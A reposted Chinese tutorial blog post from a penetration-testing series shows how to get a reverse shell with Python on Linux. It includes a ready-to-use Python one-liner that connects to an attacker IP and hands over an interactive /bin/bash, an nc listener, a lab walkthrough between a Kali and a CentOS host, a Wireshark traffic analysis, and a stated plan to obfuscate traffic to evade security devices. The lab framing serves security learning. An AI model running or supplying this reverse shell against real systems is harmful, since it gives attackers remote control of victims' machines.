首页 最新 热门 推荐

  • 首页
  • 最新
  • 热门
  • 推荐

[隧道代理] 隧道代理 — 反弹 Shell - Python 反弹 Shell

  • 25-02-20 15:00
  • 3799
  • 13060
blog.csdn.net

关注这个专栏的其他相关笔记:[内网安全] 内网渗透 - 学习手册-CSDN博客

0x01:Python 工具介绍

Python 是一种高级、解释型、通用的编程语言,由 Guido van Rossum 于 1991 年首次发布。它以简洁、易读的语法著称,适合初学者和专业开发者。Python 支持多种编程范式,包括面向对象、函数式和过程式编程。

大部分的 Linux 系统中都默认安装了 Python,笔者看了大部分使用 Python 做反弹 Shell 的代码,其本质依旧是使用 Linux 中的 /bin/bash 来做反弹连接(笔者其实想整一个针对 Windows 的,但是仔细想了想,Windows 好像真没啥自带的能做反弹连接的工具,纠正一下,笔者现在没找到)。虽然没有找到,但 Python 作为一款支持网络编程的语言,写个互通的工具应该还是挺简单的吧。

0x0101:定位本地 Python 环境

要想使用 Python 进行反弹 Shell,首先得确定靶机上存在 Python 环境呀,使用下面的命令就可以完成这一操作:

  1.  python -V                    # 适合 Windows Or Linux
  2.  which python python2 python3 # 适合 Linux

0x0102:Python 反弹 Shell 标准格式

下面这个就是在 Linux 系统中使用 Python 进行反弹 Shell 的标准语法:

 python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("攻击机 IP",攻击机端口));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);subprocess.call(["/bin/bash","-i"]);'

0x02:Python 反弹 Shell

这里使用的 Python 反弹 Shell,由于是其本质是借助 /bin/bash,所以和 bash 一样,只能用于反向连接,不能用于正向连接。对于正向连接与反向连接的使用场景,相信看过前面 NetCat(NC)反弹 Shell 的小伙伴都已经很清楚了,所以笔者这里就不费笔墨讲解场景了,直接开始实验。

0x0201:Python 反弹 Shell — 实验流程

复现环境

  • 攻击机 Kali Linux:IP 192.168.0.102

  • 靶机 CentOS7:IP 192.168.0.105

首先,在攻击机中执行如下命令,监听本机的 9999 端口,等待靶机自己上钩:

 nc -lvvp 9999

然后来到靶机中,执行如下命令,将自己的控制权移交给攻击者的 9999 端口:

 python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.0.102",9999));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);subprocess.call(["/bin/bash","-i"]);'

此时我们回到 Kali 攻击机中,可以看到靶机成功上线:

0x0201:Python 反弹 Shell — 流量分析

接下来我们就以上面我们通过 Python 反弹 Shell 在靶机上执行 ifconfig 命令为例,来分析一下 Python 反弹 Shell 的流量特征。

在 Kali Linux 中打开 WireShark,并重新在反弹 Shell 的界面中输入 ifconfig 后进行抓包:

跟我们前面分析的一样,上面这种一句话使用 Python 反弹 Shell 的本质其实还是借助 bash 进行反弹的,流量特征与走 TCP 流量的 Bash 反弹连接是一致的(所以说呢,安全任重而道远,后面笔者会尝试更新如何自制客户端与服务端,并对流量进行混淆,以尝试绕过安全设备)。

Hack3rX
微信公众号
这里是探索网络安全与黑客技术的秘密基地
注:本文转载自blog.csdn.net的Blue17 :: Hack3rX的文章"https://blog.csdn.net/m0_73360524/article/details/145604490"。版权归原作者所有,此博客不拥有其著作权,亦不承担相应法律责任。如有侵权,请联系我们删除。
复制链接
复制链接
相关推荐
发表评论
登录后才能发表评论和回复 注册

/ 登录

评论记录:

未查询到任何数据!
回复评论:

分类栏目

后端 (14832) 前端 (14280) 移动开发 (3760) 编程语言 (3851) Java (3904) Python (3298) 人工智能 (10119) AIGC (2810) 大数据 (3499) 数据库 (3945) 数据结构与算法 (3757) 音视频 (2669) 云原生 (3145) 云平台 (2965) 前沿技术 (2993) 开源 (2160) 小程序 (2860) 运维 (2533) 服务器 (2698) 操作系统 (2325) 硬件开发 (2492) 嵌入式 (2955) 微软技术 (2769) 软件工程 (2056) 测试 (2865) 网络空间安全 (2948) 网络与通信 (2797) 用户体验设计 (2592) 学习和成长 (2593) 搜索 (2744) 开发工具 (7108) 游戏 (2829) HarmonyOS (2935) 区块链 (2782) 数学 (3112) 3C硬件 (2759) 资讯 (2909) Android (4709) iOS (1850) 代码人生 (3043) 阅读 (2841)

热门文章

101
推荐
关于我们 隐私政策 免责声明 联系我们
Copyright © 2020-2025 蚁人论坛 (iYenn.com) All Rights Reserved.
Scroll to Top